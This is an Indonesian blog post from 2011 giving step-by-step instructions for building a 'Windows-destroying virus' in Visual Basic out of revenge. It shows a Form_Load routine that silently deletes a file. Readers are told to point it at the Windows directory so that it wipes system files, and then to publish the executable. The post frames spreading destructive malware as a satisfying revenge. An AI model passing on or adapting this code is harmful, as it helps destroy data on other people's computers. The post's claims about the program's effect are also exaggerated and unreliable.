• Breaking News

    Panduan dan Tutorial Lengkap serta Materi Pelajaran di Mulyono Blog. Konten Terlengkap dan Terpercaya

    Senin, 29 Agustus 2011

    Pembuatan Virus perusak Windows

    Kesal karena komputer Anda selalu menjadi bulan-bulanan virus yang dibuat oleh orang-orang dengan kemempuan pemograman yang tinggi? kenapa tidak balas dendam saja. Karena komputer saya juga sering terkena virus maka saya membuat virus sebagai tanda balas dendam, tetapi sampai sekarang virus perusak windows yang saya namai"Windows Shooter" belum saya sebarkan karena saya masih ingat dosa :), sebagai pengganti rasa balas dendam saya maka dalam postingan ini akan saya beritahu bagaimana cara membuat virus perusak Windows, sehingga rasa balas dendam Anda juga bisa dipuaskan
    1. Siapkan Visual Basic Anda, virus ini menggunakan Visual Basic dalam pembuatannya
    2. Buat project baru
    3. Ketikan skrip berikut ini

    Private Sub Form_Load()

    On Error Resume Next
    Kill "c:\aa.txt"
    End Sub

    pada bagian Kill "c:\aa.txt" adalah rumus yang digunakan untuk menghapus file aa.txt yang berada pada direktori C, Anda bisa mengubah "c:\aa.txt" dengan path lain seperti path wondows, sehingga ketika program dijalankan akan menghapus seluruh file dalam direktori windows

    4. Publish exe project tersebut

    Tidak bisa dibayangkan betapa besarnya efek yang ditimbulkan oleh virus tersebut